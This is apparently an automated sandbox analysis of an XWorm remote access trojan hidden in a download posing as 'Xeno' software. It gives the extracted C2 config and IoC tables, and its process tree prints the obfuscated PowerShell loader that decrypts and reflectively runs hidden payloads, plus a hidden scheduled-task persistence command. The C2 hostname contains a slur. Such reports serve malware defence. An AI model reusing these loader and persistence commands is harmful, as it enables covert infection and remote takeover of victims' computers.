xworm | hxxps://gofile[.]io/d/t9UfIZ

Analysis

max time kernel
78s
max time network
79s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
26/01/2025, 12:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/t9UfIZ

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Attributes

Install_directory
%LocalAppData%
install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/5784-605-0x000001F4E4C50000-0x000001F4E4C62000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 20 IoCs

flow	pid	Process
73	5784	powershell.exe
76	5784	powershell.exe
77	5784	powershell.exe
80	5784	powershell.exe
81	5784	powershell.exe
82	5784	powershell.exe
84	5784	powershell.exe
85	5784	powershell.exe
86	5784	powershell.exe
87	5784	powershell.exe
88	5784	powershell.exe
92	5784	powershell.exe
93	5784	powershell.exe
94	5784	powershell.exe
95	5784	powershell.exe
96	5784	powershell.exe
97	5784	powershell.exe
101	5784	powershell.exe
102	5784	powershell.exe
103	5784	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6668	powershell.exe
6868	powershell.exe
5784	powershell.exe
5940	powershell.exe
2876	powershell.exe
4524	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
6204	Xeno.exe

Loads dropped DLL 7 IoCs

pid	Process
6204	Xeno.exe
6204	Xeno.exe
6204	Xeno.exe
6204	Xeno.exe
6204	Xeno.exe
6204	Xeno.exe
6204	Xeno.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\Users\\Admin\\AppData\\Local\\powershell.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
98	raw.githubusercontent.com
99	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
72	ip-api.com

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\4f27711f-8129-4679-a657-f026e700d2d1.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250126120710.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3463531801-1484541064-3495084620-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
2724	msedge.exe
2724	msedge.exe
2504	msedge.exe
2504	msedge.exe
2740	identity_helper.exe
2740	identity_helper.exe
4572	msedge.exe
4572	msedge.exe
6668	powershell.exe
6668	powershell.exe
6668	powershell.exe
6868	powershell.exe
6868	powershell.exe
6868	powershell.exe
5784	powershell.exe
5784	powershell.exe
5784	powershell.exe
5940	powershell.exe
5940	powershell.exe
5940	powershell.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
4524	powershell.exe
4524	powershell.exe
4524	powershell.exe
6204	Xeno.exe
6204	Xeno.exe
6204	Xeno.exe
6204	Xeno.exe
6204	Xeno.exe
6204	Xeno.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5524	7zG.exe
Token: 35	5524	7zG.exe
Token: SeSecurityPrivilege	5524	7zG.exe
Token: SeSecurityPrivilege	5524	7zG.exe
Token: SeDebugPrivilege	6668	powershell.exe
Token: SeDebugPrivilege	6868	powershell.exe
Token: SeIncreaseQuotaPrivilege	6868	powershell.exe
Token: SeSecurityPrivilege	6868	powershell.exe
Token: SeTakeOwnershipPrivilege	6868	powershell.exe
Token: SeLoadDriverPrivilege	6868	powershell.exe
Token: SeSystemProfilePrivilege	6868	powershell.exe
Token: SeSystemtimePrivilege	6868	powershell.exe
Token: SeProfSingleProcessPrivilege	6868	powershell.exe
Token: SeIncBasePriorityPrivilege	6868	powershell.exe
Token: SeCreatePagefilePrivilege	6868	powershell.exe
Token: SeBackupPrivilege	6868	powershell.exe
Token: SeRestorePrivilege	6868	powershell.exe
Token: SeShutdownPrivilege	6868	powershell.exe
Token: SeDebugPrivilege	6868	powershell.exe
Token: SeSystemEnvironmentPrivilege	6868	powershell.exe
Token: SeRemoteShutdownPrivilege	6868	powershell.exe
Token: SeUndockPrivilege	6868	powershell.exe
Token: SeManageVolumePrivilege	6868	powershell.exe
Token: 33	6868	powershell.exe
Token: 34	6868	powershell.exe
Token: 35	6868	powershell.exe
Token: 36	6868	powershell.exe
Token: SeIncreaseQuotaPrivilege	6868	powershell.exe
Token: SeSecurityPrivilege	6868	powershell.exe
Token: SeTakeOwnershipPrivilege	6868	powershell.exe
Token: SeLoadDriverPrivilege	6868	powershell.exe
Token: SeSystemProfilePrivilege	6868	powershell.exe
Token: SeSystemtimePrivilege	6868	powershell.exe
Token: SeProfSingleProcessPrivilege	6868	powershell.exe
Token: SeIncBasePriorityPrivilege	6868	powershell.exe
Token: SeCreatePagefilePrivilege	6868	powershell.exe
Token: SeBackupPrivilege	6868	powershell.exe
Token: SeRestorePrivilege	6868	powershell.exe
Token: SeShutdownPrivilege	6868	powershell.exe
Token: SeDebugPrivilege	6868	powershell.exe
Token: SeSystemEnvironmentPrivilege	6868	powershell.exe
Token: SeRemoteShutdownPrivilege	6868	powershell.exe
Token: SeUndockPrivilege	6868	powershell.exe
Token: SeManageVolumePrivilege	6868	powershell.exe
Token: 33	6868	powershell.exe
Token: 34	6868	powershell.exe
Token: 35	6868	powershell.exe
Token: 36	6868	powershell.exe
Token: SeIncreaseQuotaPrivilege	6868	powershell.exe
Token: SeSecurityPrivilege	6868	powershell.exe
Token: SeTakeOwnershipPrivilege	6868	powershell.exe
Token: SeLoadDriverPrivilege	6868	powershell.exe
Token: SeSystemProfilePrivilege	6868	powershell.exe
Token: SeSystemtimePrivilege	6868	powershell.exe
Token: SeProfSingleProcessPrivilege	6868	powershell.exe
Token: SeIncBasePriorityPrivilege	6868	powershell.exe
Token: SeCreatePagefilePrivilege	6868	powershell.exe
Token: SeBackupPrivilege	6868	powershell.exe
Token: SeRestorePrivilege	6868	powershell.exe
Token: SeShutdownPrivilege	6868	powershell.exe
Token: SeDebugPrivilege	6868	powershell.exe
Token: SeSystemEnvironmentPrivilege	6868	powershell.exe
Token: SeRemoteShutdownPrivilege	6868	powershell.exe
Token: SeUndockPrivilege	6868	powershell.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
5524	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe
2504	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2504 wrote to memory of 1520	2504	msedge.exe	83
PID 2504 wrote to memory of 1520	2504	msedge.exe	83
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 4504	2504	msedge.exe	85
PID 2504 wrote to memory of 2724	2504	msedge.exe	86
PID 2504 wrote to memory of 2724	2504	msedge.exe	86
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87
PID 2504 wrote to memory of 3064	2504	msedge.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/t9UfIZ
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffae3f046f8,0x7ffae3f04708,0x7ffae3f04718
  2⤵
  PID:1520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
  2⤵
  PID:4504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
  2⤵
  PID:3064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:4284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
  2⤵
  PID:896
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  PID:3024
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:1728
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6336b5460,0x7ff6336b5470,0x7ff6336b5480
    3⤵
    PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:4836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3612 /prefetch:8
  2⤵
  PID:4408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
  2⤵
  PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6028 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:1
  2⤵
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7530125132520276038,10178362689390551252,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
  2⤵
  PID:2064

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1524

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4376

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5204

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\" -ad -an -ai#7zMap12776:94:7zEvent25507
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\xrequirement.bat" "
1⤵
PID:6544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EjAjf1fqjutL91JXoTtvddGQptdQruqcSxVbWJHQsNI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dKRpEJwy4/2ZzHKFEziHzA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jIWwE=New-Object System.IO.MemoryStream(,$param_var); $IOxOJ=New-Object System.IO.MemoryStream; $GGmwV=New-Object System.IO.Compression.GZipStream($jIWwE, [IO.Compression.CompressionMode]::Decompress); $GGmwV.CopyTo($IOxOJ); $GGmwV.Dispose(); $jIWwE.Dispose(); $IOxOJ.Dispose(); $IOxOJ.ToArray();}function execute_function($param_var,$param2_var){ $NTGnH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wsgkx=$NTGnH.EntryPoint; $wsgkx.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\xrequirement.bat';$ZamCc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Xeno-v1.1.35-x64\Xeno-v1.1.35-x64\xrequirement.bat').Split([Environment]::NewLine);foreach ($UeXGV in $ZamCc) { if ($UeXGV.StartsWith(':: ')) { $VjfcL=$UeXGV.Substring(3); break; }}$payloads_var=[string[]]$VjfcL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_468_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_468.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6868
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_468.vbs"
    3⤵
    - Checks computer location settings
    PID:7076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_468.bat" "
      4⤵
      PID:7156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EjAjf1fqjutL91JXoTtvddGQptdQruqcSxVbWJHQsNI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dKRpEJwy4/2ZzHKFEziHzA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jIWwE=New-Object System.IO.MemoryStream(,$param_var); $IOxOJ=New-Object System.IO.MemoryStream; $GGmwV=New-Object System.IO.Compression.GZipStream($jIWwE, [IO.Compression.CompressionMode]::Decompress); $GGmwV.CopyTo($IOxOJ); $GGmwV.Dispose(); $jIWwE.Dispose(); $IOxOJ.Dispose(); $IOxOJ.ToArray();}function execute_function($param_var,$param2_var){ $NTGnH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wsgkx=$NTGnH.EntryPoint; $wsgkx.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_468.bat';$ZamCc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_468.bat').Split([Environment]::NewLine);foreach ($UeXGV in $ZamCc) { if ($UeXGV.StartsWith(':: ')) { $VjfcL=$UeXGV.Substring(3); break; }}$payloads_var=[string[]]$VjfcL.Split('\');$payload1_var=decompress_function (decrypt_function 